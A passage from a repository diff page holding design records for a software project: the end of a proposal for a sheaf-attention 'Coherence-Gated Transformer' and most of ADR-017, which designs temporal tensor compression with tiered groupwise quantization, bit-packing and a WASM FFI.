Use case: Ambiguous, contradictory, or complex tokens
Example: "bank" (river or financial?), negations, rare words
```
### Lane 3: Escalate (async)
```
Action: Return uncertainty, request clarification
Use case: Irreconcilable incoherence
Example: "The cat is not a cat" - logical contradiction
```
---
## Mathematical Foundation
### Sheaf Attention Formula
Given tokens X = {x_1, ..., x_N} and restriction maps ρ_i, ρ_j:
**Residual**:
```
r_ij = ρ_i(x_i) - ρ_j(x_j)
```
**Edge energy**:
```
E_ij = w_ij × ||r_ij||²
```
**Token energy**:
```
E_i = Σ_j E_ij (sum over edges incident to i)
```
**Attention weight** (coherence-based):
```
A_ij = exp(-β × E_ij) / Σ_k exp(-β × E_ik)
```
**Output**:
```
y_i = Σ_j A_ij × V_j
```
### Complexity Analysis
| Operation | Standard | Sheaf (Dense) | Sheaf (Sparse, s% non-zero) |
|-----------|----------|---------------|----------------------------|
| Attention | O(N²d) | O(N²d) | O(s×N²d) |
| Routing | - | O(Nd) | O(Nd) |
| Early exit | - | O(Ld) per check | O(Ld) per check |
| **Total** | O(N²Ld) | O(N²Ld) | O(s×N²Ld + routing) |
With typical s=10-20% sparsity and 50% early exit: **5-10x speedup**.
---
## Integration with `ruvector-attention`
### New Modules
```
ruvector-attention/
├── src/
│ ├── sheaf/ # NEW: Sheaf attention
│ │ ├── mod.rs
│ │ ├── attention.rs # SheafAttention layer
│ │ ├── restriction.rs # Restriction map projections
│ │ ├── router.rs # Token-level routing
│ │ ├── sparse.rs # Residual-sparse attention
│ │ └── early_exit.rs # Energy-based early exit
│ │
│ ├── coherence_gated/ # NEW: Full CGT implementation
│ │ ├── mod.rs
│ │ ├── transformer.rs # CoherenceGatedTransformer
│ │ ├── lane.rs # ComputeLane enum + configs
│ │ ├── config.rs # CGTConfig
│ │ └── benchmark.rs # Latency/quality benchmarks
│ │
│ └── ... (existing modules)
```
### New Types
```rust
/// Sheaf-based attention layer
pub struct SheafAttention {
/// Restriction map for queries
pub rho_query: RestrictionMap,
/// Restriction map for keys
pub rho_key: RestrictionMap,
/// Restriction map for values
pub rho_value: RestrictionMap,
/// Temperature for attention softmax
pub beta: f32,
/// Sparsity threshold
pub sparsity_threshold: f32,
}
/// Compute lane for token routing
#[derive(Debug, Clone, Copy)]
pub enum ComputeLane {
/// Minimal compute (<0.1ms)
Reflex,
/// Standard compute (~1ms)
Standard,
/// Deep compute (~5ms)
Deep,
/// Escalate to caller
Escalate,
}
/// Coherence-Gated Transformer configuration
pub struct CGTConfig {
/// Embedding dimension
pub d_model: usize,
/// Layers per lane
pub layers_per_lane: [usize; 3], // [reflex, standard, deep]
/// Routing thresholds
pub thresholds: CoherenceThresholds,
/// Sparsity settings
pub sparsity: SparsityConfig,
/// Early exit settings
pub early_exit: EarlyExitConfig,
}
/// Token routing decision
pub struct RoutingDecision {
pub token_id: usize,
pub energy: f32,
pub lane: ComputeLane,
pub attention_mask: Option<SparseMask>,
}
```
### Feature Flags
```toml
[features]
# Sheaf attention (requires prime-radiant)
sheaf = ["dep:prime-radiant"]
# Full CGT implementation
coherence-gated = ["sheaf", "sparse", "moe"]
# Benchmarking utilities
cgt-bench = ["coherence-gated", "criterion"]
```
---
## Performance Targets
| Metric | Standard Transformer | CGT Target | Improvement |
|--------|---------------------|------------|-------------|
| Average latency (128 tokens) | 10ms | 1-2ms | 5-10x |
| P99 latency (128 tokens) | 15ms | 8ms | 2x |
| Memory (batch=32) | 2GB | 800MB | 2.5x |
| Quality (perplexity) | Baseline | <5% degradation | Acceptable |
### Latency Breakdown
```
Standard (10ms total):
Attention: 6ms (60%)
FFN: 3ms (30%)
Other: 1ms (10%)
CGT Target (2ms total):
Routing: 0.1ms (5%)
Attention (sparse): 1ms (50%)
FFN (conditional): 0.7ms (35%)
Other: 0.2ms (10%)
```
---
## Quality Guarantees
### Coherence Bound
Every output is guaranteed to have coherence energy below threshold:
```
E(output) < θ_max OR escalate/refuse
```
This is **stronger** than confidence-based systems which can be confidently wrong.
### Graceful Degradation
Under compute pressure:
1. Raise θ_reflex → more tokens to Lane 0
2. Increase sparsity threshold → fewer attention computations
3. Quality degrades **predictably** (energy increases)
### Interpretability
For any output:
- Which tokens went to which lane?
- Which token pairs had high residuals?
- Where did the model "struggle"?
---
## Comparison with Existing Approaches
| Feature | Flash Attention | Sparse Transformers | MoE | CGT (Ours) |
|---------|-----------------|---------------------|-----|------------|
| Adaptive compute | No | No | Yes | Yes |
| Content-based sparsity | No | No | Partial | Yes |
| Mathematical grounding | No | No | No | Yes (sheaf) |
| Quality guarantee | No | No | No | Yes (energy bound) |
| Interpretable routing | N/A | N/A | Partial | Yes |
| Early exit criterion | N/A | N/A | Confidence | Energy convergence |
---
## Research Questions
1. **Restriction map initialization**: Random vs. pre-trained vs. analytical?
2. **Threshold tuning**: Can SONA auto-tune θ values during inference?
3. **Multi-head sheaf attention**: One graph per head, or shared graph?
4. **Training objective**: Standard cross-entropy + energy regularization?
5. **Hardware optimization**: Can residual computation be fused with attention kernels?
---
## Implementation Phases
### Phase 1: Foundation (Weeks 1-4)
- [ ] `SheafAttention` layer with restriction maps
- [ ] Basic residual computation
- [ ] Unit tests for mathematical correctness
### Phase 2: Routing (Weeks 5-8)
- [ ] `ComputeLane` enum and routing logic
- [ ] Token-level energy computation
- [ ] Lane-specific layer configurations
### Phase 3: Sparsity (Weeks 9-12)
- [ ] Residual-sparse attention mask generation
- [ ] Efficient sparse attention kernel
- [ ] Sparsity pattern analysis tools
### Phase 4: Integration (Weeks 13-16)
- [ ] `CoherenceGatedTransformer` full implementation
- [ ] Early exit with energy convergence
- [ ] Benchmarking suite
### Phase 5: Optimization (Weeks 17-20)
- [ ] SIMD optimization for residual computation
- [ ] Kernel fusion opportunities
- [ ] SONA integration for threshold tuning
---
## Dependencies
### Required
- `prime-radiant` (coherence computation)
- `ruvector-core` (vector operations)
- `ndarray` (matrix operations)
### Optional
- `rayon` (parallel routing)
- `criterion` (benchmarking)
---
## References
1. Hansen, J., & Ghrist, R. (2019). "Toward a spectral theory of cellular sheaves."
2. Vaswani et al. (2017). "Attention Is All You Need."
3. Kitaev et al. (2020). "Reformer: The Efficient Transformer."
4. Fedus et al. (2022). "Switch Transformers: Scaling to Trillion Parameter Models."
5. ADR-014: Coherence Engine Architecture
---
## Related Decisions
- **ADR-014**: Coherence Engine Architecture (Prime-Radiant)
- **ADR-003**: SIMD Optimization Strategy
- **ADR-006**: Memory Management
---
## Appendix: Name Options
| Name | Rationale |
|------|-----------|
| **Coherence-Gated Transformer (CGT)** | Descriptive, clear function |
| **Sheaf Attention** | Mathematical foundation |
| **Residual-Routed Transformer** | Emphasizes routing mechanism |
| **Energy-Adaptive Transformer** | Emphasizes efficiency |
| **Prime Transformer** | Connection to Prime-Radiant |
**Recommended**: "Coherence-Gated Transformer (CGT)" for the architecture, "Sheaf Attention" for the attention mechanism.

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,703 @@
# ADR-017: Temporal Tensor Compression with Tiered Quantization
**Status**: Proposed
**Date**: 2026-02-06
**Parent**: ADR-001 RuVector Core Architecture, ADR-004 KV Cache Management, ADR-005 WASM Runtime Integration
**Author**: System Architecture Team
**SDK**: Claude-Flow
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-02-06 | Architecture Team | Initial SOTA research and design proposal |
---
## Abstract
This ADR introduces a **temporal tensor compression** system with **tiered quantization** for RuVector. The system exploits two key observations: (1) tensors accessed at different frequencies can tolerate different precision levels, and (2) quantization parameters (scales) can be amortized across consecutive time frames when the underlying distribution is stable. Together these yield 4x-10.67x compression over f32 while keeping reconstruction error within configurable bounds.
The implementation targets Rust with a zero-dependency WASM-compatible core, matching the sandboxed execution model established in ADR-005.
---
## 1. Context and Motivation
### 1.1 The Memory-Bandwidth Wall
Memory size and memory bandwidth dominate deployment cost for tensor-heavy workloads. ADR-004 established a three-tier KV cache (FP16 / 4-bit / 2-bit) but addresses only static snapshots of key-value pairs. Modern agent systems (RuVector's primary workload) produce **streams of tensor frames** - embeddings, activations, gradient sketches, coherence vectors - that evolve over time. Storing each frame independently wastes metadata and misses temporal redundancy.
**Memory scaling for agent tensor streams:**
| Tensor Dim | Frames/sec | Duration | Raw f32 | 8-bit | 5-bit | 3-bit |
|-----------|------------|----------|---------|-------|-------|-------|
| 512 | 10 | 1 hour | 73.7 MB | 18.4 MB | 11.5 MB | 6.9 MB |
| 2048 | 10 | 1 hour | 294.9 MB | 73.7 MB | 46.1 MB | 27.6 MB |
| 4096 | 50 | 1 hour | 2.95 GB | 737 MB | 461 MB | 276 MB |
### 1.2 Limitations of Current Quantization (ruvector-core)
The existing `quantization.rs` in `ruvector-core` provides:
| Method | Compression | Limitation |
|--------|-------------|------------|
| Scalar (u8) | 4x | Per-vector min/max scales; no temporal reuse |
| Int4 | 8x | Fixed 4-bit; no adaptive tier selection |
| Product | 8-16x | Requires codebook training; high latency |
| Binary | 32x | Too lossy for reconstruction-sensitive paths |
**Missing capabilities:**
- No temporal scale reuse across frames
- No access-pattern-driven tier selection
- No sub-byte bit packing (5-bit, 7-bit)
- No drift-aware segment boundaries
- No WASM-native compression path
### 1.3 Why Temporal Compression
The core insight: when a tensor's value distribution is stable over consecutive frames, the quantization scales computed for frame *t* remain valid for frames *t+1, t+2, ..., t+k*. Reusing scales across *k* frames amortizes the per-group scale overhead by *k*x and avoids redundant calibration passes.
This is the same principle behind:
- **Video codecs** (H.264/H.265): I-frames carry full parameters; P-frames reuse them until a scene change
- **Time-series databases** (Gorilla, InfluxDB): Delta-of-delta encoding reuses a base until drift exceeds a threshold
- **Streaming quantization** (QuaRot, KIVI): Per-channel parameters reused across tokens until attention pattern shifts
---
## 2. SOTA Research Summary
### 2.1 Groupwise Quantization (State of the Art 2024-2026)
Modern quantization systems converge on **per-group symmetric quantization** as the optimal accuracy-metadata tradeoff:
| System | Year | Approach | Key Innovation |
|--------|------|----------|----------------|
| **GPTQ** | 2023 | Per-column Hessian-weighted quantization | OBQ with lazy batch updates; group_size=128 standard |
| **AWQ** | 2024 | Activation-aware weight quantization | Protects salient channels via per-channel scaling |
| **SqueezeLLM** | 2024 | Non-uniform with sensitivity grouping | Dense-and-sparse decomposition for outliers |
| **QuIP#** | 2024 | Incoherence via random Hadamard | Enables high-quality 2-bit with lattice codebooks |
| **AQLM** | 2024 | Additive multi-codebook quantization | 2-bit with learned codebooks; beam search optimization |
| **SpinQuant** | 2024 | Rotation-based Cayley optimization | Learnable rotation matrices; Llama-2-7B 4-bit = FP16 parity |
| **KIVI** | 2024 | Per-channel key, per-token value | 2-bit KV cache with <0.1 ppl increase on Llama-2 |
| **Atom** | 2024 | Mixed-precision with reordering | Handles activation outliers via channel reordering |
**Consensus finding**: Group sizes of 32-128 provide the best accuracy-metadata tradeoff. Symmetric quantization (no zero-point) is sufficient when distribution is roughly centered, which holds for most intermediate tensors. The scale storage cost is `ceil(tensor_len / group_len) * sizeof(scale)`.
### 2.2 Sub-4-Bit Quantization Viability
| Bits | Compression vs f32 | Typical Quality Impact | Viable For |
|------|-------------------|----------------------|------------|
| 8 | 4.00x | Negligible (<0.01 ppl) | Hot path, full fidelity |
| 7 | 4.57x | Negligible (<0.02 ppl) | Warm path, near-lossless |
| 5 | 6.40x | Minor (0.05-0.1 ppl) | Warm path, acceptable loss |
| 4 | 8.00x | Moderate (0.1-0.3 ppl) | Well-studied; GPTQ/AWQ standard |
| 3 | 10.67x | Significant (0.3-1.0 ppl) | Cold path with bounded error |
| 2 | 16.00x | Large (1.0-3.0 ppl) | Archive only; KIVI/QuIP# needed |
**Key finding**: 3-bit symmetric quantization is the practical floor for reconstruction-required tensors. Below 3-bit, non-uniform or lattice codebook methods (QuIP#, AQLM) are needed to maintain quality, at much higher complexity.
### 2.3 Temporal Scale Reuse
No widely published system directly addresses temporal reuse of quantization scales for streaming tensor data. The closest analogs are:
1. **Gorilla (Facebook, 2015)**: XOR-based delta encoding for time-series floats; reuses a base encoding until delta exceeds threshold
2. **KIVI token reuse**: Per-channel scales for keys are computed once and applied to all tokens in the channel
3. **QuaRot (2024)**: Rotation matrices computed once per layer, reused for all tokens
4. **Streaming quantization in video**: DCT coefficients reused across P-frames until I-frame refresh
Our temporal segment approach generalizes these: compute group scales once per segment, emit packed codes for each frame, start a new segment on tier change or drift exceedance.
### 2.4 Bit-Packing Techniques
Standard bitstream packing (accumulator + shift) is the established approach for arbitrary-width codes:
```
For each code of width B bits:
accumulator |= code << acc_bits
acc_bits += B
while acc_bits >= 8:
emit(accumulator & 0xFF)
accumulator >>= 8
acc_bits -= 8
```
**SIMD acceleration**: For fixed widths (3, 5, 7, 8), vectorized pack/unpack can process 16-32 codes per SIMD iteration using shuffles and masks. The `bitpacking` crate achieves 4-8 GB/s on AVX2 for fixed-width packing. For WASM, the 128-bit SIMD proposal (widely supported since 2023) enables similar throughput.
### 2.5 Rust + WASM Performance Landscape
| Aspect | Status (2026) |
|--------|---------------|
| wasm32-unknown-unknown | Stable, widely deployed |
| WASM SIMD (128-bit) | Supported in all major browsers and runtimes |
| wasm32-wasi | Stable, server-side WASM standard |
| Linear memory model | Single contiguous address space; 32-bit pointers |
| `#[no_mangle] extern "C"` | Standard FFI pattern for WASM exports |
| Static mut in single-threaded WASM | Sound (no data races possible) but future-fragile |
**Relevant Rust WASM tensor libraries**: candle (Hugging Face), burn, tract. All demonstrate that high-performance tensor operations are viable in Rust/WASM with careful memory management.
---
## 3. Decision
### 3.1 Introduce Temporal Tensor Compression as a New Crate
We introduce `ruvector-temporal-tensor` (with WASM variant `ruvector-temporal-tensor-wasm`) implementing:
1. **Groupwise symmetric quantization** with f16 scales
2. **Temporal segments** that amortize scales across frames
3. **Three-tier access-driven bit-width selection** (8/7-or-5/3)
4. **Bitstream packing** with no byte-alignment waste
5. **WASM-compatible FFI** with handle-based resource management
### 3.2 Architecture Overview
```
+===========================================================================+
| TEMPORAL TENSOR COMPRESSION ARCHITECTURE |
+===========================================================================+
| |
| Input Frame (f32[N]) |
| | |
| v |
| +----------------+ +-----------------+ +--------------------+ |
| | Tier Policy |---->| Segment Manager |---->| Segment Store | |
| | | | | | (Vec<u8> blobs) | |
| | score = count | | - drift check | | | |
| | * 1024 / age | | - scale reuse | | Magic: TQTC | |
| | | | - bit-width sel | | Version: 1 | |
| | Hot: 8-bit | | | | Bits, GroupLen, | |
| | Warm: 7/5-bit | +---------+-------+ | TensorLen, Frames, | |
| | Cold: 3-bit | | | Scales[], Data[] | |
| +----------------+ | +--------------------+ |
| v |
| +----------------------------------------------------------------+ |
| | QUANTIZATION PIPELINE | |
| | | |
| | f32 values | |
| | | | |
| | v | |
| | [Group 0: max_abs -> scale_f16] [Group 1: ...] [Group K: ...] | |
| | | | |
| | v | |
| | q_i = round(v_i / scale) // symmetric, no zero-point | |
| | q_i = clamp(q_i, -qmax, +qmax) | |
| | | | |
| | v | |
| | u_i = q_i + bias // signed -> unsigned mapping | |
| | | | |
| | v | |
| | [Bitstream Packer: B-bit codes, no alignment padding] | |
| +----------------------------------------------------------------+ |
| |
| Decode: bitstream unpack -> unsigned -> signed -> scale multiply |
+===========================================================================+
```
### 3.3 Segment Binary Format
```
Offset Size Field Description
------ ------ --------------- -----------------------------------------
0 4 magic 0x43545154 ("TQTC" in LE ASCII)
4 1 version Format version (currently 1)
5 1 bits Bit width for this segment (3, 5, 7, or 8)
6 4 group_len Elements per quantization group
10 4 tensor_len Number of f32 elements per frame
14 4 frame_count Number of frames in this segment
18 4 scale_count Number of f16 group scales
22 2*S scales f16 scale values (S = scale_count)
22+2S 4 data_len Length of packed bitstream in bytes
26+2S D data Packed quantized codes (D = data_len)
```
**Segment size formula:**
```
segment_bytes = 26 + 2*ceil(tensor_len/group_len) + ceil(tensor_len * frame_count * bits / 8)
```
### 3.4 Tier Policy Design
```
Score = access_count * 1024 / (now_ts - last_access_ts + 1)
Tier 1 (Hot): score >= hot_min_score -> 8-bit (~4.0x compression)
Tier 2 (Warm): score >= warm_min_score -> 7-bit (~4.57x) or 5-bit (~6.4x)
Tier 3 (Cold): score < warm_min_score -> 3-bit (~10.67x compression)
```
**Default thresholds:**
| Parameter | Default | Rationale |
|-----------|---------|-----------|
| `hot_min_score` | 512 | ~2 accesses/sec for recent data |
| `warm_min_score` | 64 | ~1 access every 16 seconds |
| `warm_bits` | 7 | Conservative warm tier; set to 5 for aggressive |
| `drift_pct_q8` | 26 | ~10.2% drift tolerance (26/256) |
| `group_len` | 64 | 64 elements per group; 128 bytes of f16 scales per 256 values |
**Drift detection**: Before appending a frame to the current segment, compute `max_abs` per group and compare against `scale * qmax * drift_factor`. If any group exceeds this, flush the current segment and start a new one with recomputed scales. This bounds reconstruction error to `drift_factor * original_error`.
### 3.5 Compression Math
Effective compression ratios including scale overhead (group_len=64, f16 scales):
| Bits | Raw Ratio | Scale Overhead | Effective Ratio | Effective Ratio (100 frames) |
|------|-----------|----------------|-----------------|------------------------------|
| 8 | 4.00x | 1 f16 per 64 vals | 3.76x | 3.99x |
| 7 | 4.57x | same | 4.27x | 4.56x |
| 5 | 6.40x | same | 5.82x | 6.38x |
| 3 | 10.67x | same | 9.14x | 10.63x |
Temporal amortization: with 100 frames per segment, scale overhead becomes negligible (~0.03% of segment size).
---
## 4. Detailed Design
### 4.1 Module Architecture
```
crates/ruvector-temporal-tensor/
├── Cargo.toml
└── src/
├── lib.rs # Public API, re-exports
├── tier_policy.rs # TierPolicy: score calculation, tier selection
├── f16.rs # Software f32<->f16 conversion (no external deps)
├── bitpack.rs # Bitstream packer/unpacker for arbitrary widths
├── quantizer.rs # Groupwise symmetric quantization + dequantization
├── segment.rs # Segment encode/decode, binary format
├── compressor.rs # TemporalTensorCompressor: drift, segmentation
└── ffi.rs # WASM/C FFI: handle store, extern "C" exports
crates/ruvector-temporal-tensor-wasm/
├── Cargo.toml # wasm32-unknown-unknown target
└── src/
└── lib.rs # Re-exports FFI functions, WASM-specific config
```
### 4.2 Groupwise Symmetric Quantization
For a group of `G` values from frame `f`:
```
scale = max(|v_i| for i in group) / qmax
qmax = 2^(bits-1) - 1 // e.g., bits=8 -> qmax=127, bits=3 -> qmax=3
q_i = round(v_i / scale)
q_i = clamp(q_i, -qmax, +qmax)
u_i = q_i + qmax // bias to unsigned for packing
```
Reconstruction:
```
q_i = u_i - qmax // unbias
v_i' = q_i * scale // dequantize
```
**Why symmetric**: No zero-point storage needed. For centered distributions (which agent tensors typically are), symmetric quantization loses minimal accuracy vs asymmetric while halving metadata and simplifying the dequantize multiply.
**Why f16 scales**: 2 bytes per group vs 4 bytes for f32. For typical tensor magnitudes (1e-3 to 1e3), f16 provides sufficient precision for scales. The f16 dynamic range (6.1e-5 to 65504) covers the relevant scale values. Software f16 conversion is fast (~5ns per conversion) and avoids external crate dependencies.
### 4.3 Temporal Segment Lifecycle
```
Frame 0 Frame 1 Frame 2 ... Frame K Frame K+1
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ f32 │ │ f32 │ │ f32 │ │ f32 │ │ f32 │
└──┬──┘ └──┬──┘ └──┬──┘ └──┬──┘ └──┬──┘
│ │ │ │ │
v v v v v
┌────────────────────────────────────────────────────────┐ ┌──────────
│ SEGMENT 1 (same scales) │ │ SEGMENT 2
│ │ │ (new
│ scales: [s0, s1, ..., sG] (computed from frame 0) │ │ scales)
│ data: [packed frame 0][packed frame 1]...[frame K] │ │
└────────────────────────────────────────────────────────┘ └──────────
^
|
Drift exceeded OR
tier changed at K+1
```
**Segment boundary triggers:**
1. First frame (no active segment)
2. Tier bit-width changed (e.g., tensor went from hot to warm)
3. Any group's `max_abs > scale * qmax * drift_factor`
### 4.4 Drift Detection Algorithm
```rust
fn frame_fits_current_scales(frame, scales, qmax, drift_factor) -> bool {
for each group (idx, scale) in scales:
max_abs = max(|v| for v in group_slice(frame, idx))
allowed = f16_to_f32(scale) * qmax * drift_factor
if max_abs > allowed:
return false // Distribution has drifted
return true
}
```
The `drift_factor` is `1 + drift_pct_q8/256`. With `drift_pct_q8=26`, this is `1.1015625` (~10% tolerance). This means a group's maximum absolute value can grow by up to ~10% beyond the original calibration before triggering a new segment.
**Tradeoff**: Lower drift tolerance = more segment boundaries = more accurate but more metadata. Higher drift tolerance = fewer segments = better compression but more quantization error. The 10% default is conservative; for cold tensors, 20-30% may be acceptable.
### 4.5 Bit-Packing Implementation
The packer uses a 64-bit accumulator for sub-byte codes:
```
For each quantized unsigned code u of width B bits:
acc |= (u as u64) << acc_bits
acc_bits += B
while acc_bits >= 8:
emit byte: acc & 0xFF
acc >>= 8
acc_bits -= 8
// After all codes: flush remaining bits
if acc_bits > 0:
emit byte: acc & 0xFF
```
**Packing density** (no wasted bits):
| Bits | Codes per 8 bytes | Utilization |
|------|-------------------|-------------|
| 8 | 8 | 100% |
| 7 | 9.14 | 100% (no padding) |
| 5 | 12.8 | 100% (no padding) |
| 3 | 21.33 | 100% (no padding) |
### 4.6 f16 Software Conversion
The implementation provides bit-exact IEEE 754 half-precision conversion without external crates:
- **f32 -> f16**: Extract sign/exponent/mantissa, remap exponent bias (127 -> 15), handle denormals with rounding, infinity, NaN propagation
- **f16 -> f32**: Reverse the bias remapping, reconstruct denormals, handle special values
**Accuracy**: Round-to-nearest-even for normals. Denormal handling preserves gradual underflow. The conversion pair is not bit-exact round-trip for all f32 values (f16 has 10 mantissa bits vs f32's 23), but for scale values in the range [1e-4, 1e4], relative error is bounded by 2^-10 (~0.1%).
### 4.7 WASM FFI Design
```
┌─────────────────────────────────────────────────────┐
│ WASM Linear Memory │
│ │
│ Host allocates via ttc_alloc() │
│ Host writes f32 frames into allocated buffers │
│ Host calls ttc_push_frame(handle, ts, ptr, len, │
│ out_ptr, out_cap, &out_written) │
│ Host reads segment bytes from out_ptr │
│ Host frees via ttc_dealloc() │
│ │
│ ┌──────────────────────────────┐ │
│ │ STORE: Vec<Option<Compressor>>│ │
│ │ [0] = Some(comp_a) │ │
│ │ [1] = None (freed) │ │
│ │ [2] = Some(comp_b) │ │
│ └──────────────────────────────┘ │
└─────────────────────────────────────────────────────┘
```
**FFI function table:**
| Function | Purpose | Parameters |
|----------|---------|------------|
| `ttc_create` | Create compressor | `(len, now_ts, &out_handle)` |
| `ttc_free` | Destroy compressor | `(handle)` |
| `ttc_touch` | Record access | `(handle, now_ts)` |
| `ttc_set_access` | Set access stats | `(handle, count, last_ts)` |
| `ttc_push_frame` | Compress a frame | `(handle, ts, in_ptr, len, out_ptr, out_cap, &out_written)` |
| `ttc_flush` | Flush current segment | `(handle, out_ptr, out_cap, &out_written)` |
| `ttc_decode_segment` | Decompress segment | `(seg_ptr, seg_len, out_ptr, out_cap, &out_written)` |
| `ttc_alloc` | Allocate WASM memory | `(size, &out_ptr)` |
| `ttc_dealloc` | Free WASM memory | `(ptr, cap)` |
**Handle-based store**: Compressors are stored in a global `Vec<Option<TemporalTensorCompressor>>`. Handles are indices. Freed slots are reused. This pattern is standard for WASM FFI where the host cannot hold Rust references.
---
## 5. Integration with RuVector
### 5.1 Crate Dependency Graph
```
ruvector-temporal-tensor
(no external deps - pure Rust, WASM-safe)
ruvector-temporal-tensor-wasm
└── ruvector-temporal-tensor
ruvector-core (future integration)
└── ruvector-temporal-tensor (optional feature)
extends QuantizedVector trait
```
### 5.2 AgenticDB Integration
Compressed segments are stored as byte blobs in AgenticDB, keyed by:
```
Key: {tensor_id}:{segment_start_ts}:{segment_end_ts}
Value: segment bytes (TQTC format)
Tags: tier={hot|warm|cold}, bits={3|5|7|8}, frames={N}
```
AgenticDB's HNSW index is not used for segment lookup (segments are accessed by time range, not similarity). Instead, a B-tree or time-range index over segment keys provides O(log N) lookup.
### 5.3 Coherence Engine Integration
The coherence engine (ADR-014, ADR-015) can trigger segment boundaries via a **coherence-gated refresh**:
```
if coherence_score(tensor_id) < coherence_threshold:
compressor.flush() // Force segment boundary
// New segment will recompute scales from fresh data
```
This ensures that when the coherence engine detects structural disagreement (e.g., between an agent's embedding and the graph's expected embedding), the compression system refreshes its calibration even if drift is still within the numerical threshold.
### 5.4 Graph Lineage
Each segment can be represented as a node in RuVector's DAG (ADR-016 delta system):
- **Edges**: `tensor_id -> segment_1 -> segment_2 -> ...` (temporal lineage)
- **Metadata**: Which agent/workflow produced the tensor, tier at time of compression
- **Provenance**: Full reconstruction path from segments back to original f32 data
---
## 6. Implementation Review and Safety Analysis
### 6.1 Correctness Assessment
| Component | Status | Notes |
|-----------|--------|-------|
| Groupwise symmetric quant | Correct | `qmax = 2^(bits-1) - 1`; symmetric range [-qmax, +qmax] |
| f16 conversion | Correct with caveats | Rounding mode is round-half-up (not round-half-even); acceptable for scales |
| Bit-packing | Correct | 64-bit accumulator handles all widths 1-8 without overflow |
| Drift detection | Correct | Per-group max-abs comparison against scaled threshold |
| Segment encode/decode | Correct | Round-trip verified for all tier widths |
| Bias mapping | Correct | `bias = qmax`; unsigned range is `[0, 2*qmax]` which fits in `bits` bits |
### 6.2 Safety Analysis
| Pattern | Risk | Mitigation |
|---------|------|------------|
| `static mut STORE` | UB in multi-threaded context | WASM is single-threaded; safe in practice. Migrate to `thread_local!` or `OnceCell` for native targets. |
| `from_raw_parts` in FFI | UB if host passes invalid pointers | Host is responsible for valid pointers; standard WASM FFI contract. Add debug assertions. |
| `std::mem::forget` in `ttc_alloc` | Memory managed by host | Correct pattern; host calls `ttc_dealloc` to reconstruct and drop the Vec. |
| Null pointer checks | Partial | FFI functions check `out_written.is_null()` but not all `out_ptr`. Add null checks. |
**Recommended safety improvements for production:**
1. Replace `static mut` with `thread_local!` for native target compatibility
2. Add `#[cfg(debug_assertions)]` bounds checks in decode loops
3. Validate segment magic/version before parsing
4. Add `ttc_last_error` function for error reporting to host
### 6.3 Performance Characteristics
| Operation | Complexity | Estimated Latency (512-dim tensor) |
|-----------|------------|-----------------------------------|
| Tier selection | O(1) | <10ns |
| Drift check | O(N/G) where G=group_len | ~50ns |
| Scale computation | O(N) | ~100ns |
| Quantize + pack | O(N) | ~200ns |
| Decode + unpack | O(N) | ~200ns |
| f16 conversion | O(1) per scale | ~5ns |
**SIMD opportunity**: The inner quantize loop (`v * inv_scale`, round, clamp, pack) is highly vectorizable. With WASM SIMD (128-bit), processing 4 f32s per iteration yields ~4x speedup on the hot loop.
---
## 7. Alternatives Considered
### 7.1 Extend Existing ruvector-core Quantization
**Rejected**: The existing `QuantizedVector` trait assumes single-frame quantization with per-vector scales. Temporal segments require fundamentally different state management (multi-frame, drift-aware). Adding this to `ruvector-core` would violate single-responsibility and complicate the existing, well-tested code.
### 7.2 Use GPTQ/AWQ-style Weight Quantization
**Rejected**: GPTQ and AWQ are designed for static weight quantization with Hessian-based sensitivity. Our use case is streaming activations/embeddings that change every frame. The calibration cost of GPTQ (~minutes per layer) is prohibitive for real-time streams.
### 7.3 Delta Encoding Between Frames
**Considered but deferred**: XOR-based or arithmetic delta encoding (frame[t] - frame[t-1]) could further compress within a segment. However, this adds complexity and makes random access within a segment O(N) instead of O(1). We may add this as an optional mode in a future version.
### 7.4 Asymmetric Quantization
**Rejected for default**: Asymmetric quantization (with zero-point) adds 2 bytes of metadata per group and requires an additional subtraction in the dequantize path. For centered distributions (typical of embeddings and activations), the accuracy improvement is marginal (<0.5% relative error reduction) while the metadata cost is significant at small group sizes.
### 7.5 Using the `half` Crate for f16
**Rejected**: Adding an external dependency for f16 conversion would complicate WASM builds and increase binary size. The software f16 conversion is ~50 lines and has no performance-critical path (scales are converted once per segment, not per frame).
---
## 8. Acceptance Criteria
### 8.1 Compression Targets
| Tier | Bits | Target Compression (vs f32) | Measurement |
|------|------|-----------------------------|-------------|
| Hot | 8 | >= 3.7x (single frame), >= 3.99x (100 frames) | Segment size / raw f32 size |
| Warm (7-bit) | 7 | >= 4.2x (single frame), >= 4.56x (100 frames) | Same |
| Warm (5-bit) | 5 | >= 5.8x (single frame), >= 6.38x (100 frames) | Same |
| Cold | 3 | >= 9.0x (single frame), >= 10.6x (100 frames) | Same |
**Primary target**: On a representative 1-hour trace, achieve **>= 6x** reduction for warm tensors and **>= 10x** for cold tensors in resident bytes.
### 8.2 Accuracy Targets
| Tier | Max Relative Error | Measurement |
|------|-------------------|-------------|
| Hot (8-bit) | < 0.8% | max(|v - v'|) / max(|v|) per frame |
| Warm (7-bit) | < 1.6% | Same |
| Warm (5-bit) | < 6.5% | Same |
| Cold (3-bit) | < 30% | Same; bounded error, not bit-exact |
### 8.3 Performance Targets
| Metric | Target |
|--------|--------|
| Quantize latency (512-dim, native) | < 500ns per frame |
| Quantize latency (512-dim, WASM) | < 2us per frame |
| Decode latency (512-dim, native) | < 500ns per frame |
| WASM binary size | < 100KB (release, wasm-opt) |
| Memory overhead per compressor | < 1KB + segment data |
### 8.4 Functional Requirements
- [ ] Round-trip encode/decode produces correct results for all tier widths (3, 5, 7, 8)
- [ ] Drift detection correctly triggers segment boundaries
- [ ] Tier transitions produce valid segment boundaries
- [ ] Multiple compressors can coexist via handle system
- [ ] Segment binary format is platform-independent (little-endian)
- [ ] WASM FFI functions handle null pointers and size mismatches gracefully
- [ ] No external crate dependencies in core library
---
## 9. Risks and Mitigations
| Risk | Severity | Likelihood | Mitigation |
|------|----------|------------|------------|
| 3-bit quantization too lossy for some tensor types | High | Medium | Make tier policy configurable; allow per-tensor overrides; add quality monitoring |
| Drift detection false positives cause excessive segments | Medium | Medium | Tune drift_pct_q8; add hysteresis (require N consecutive drifts) |
| f16 scale precision insufficient for very small tensors | Medium | Low | Detect near-zero scales; fall back to f32 scales when f16 underflows |
| WASM performance 3-5x slower than native | Medium | High | Expected; optimize hot loops with WASM SIMD; acceptable for non-realtime paths |
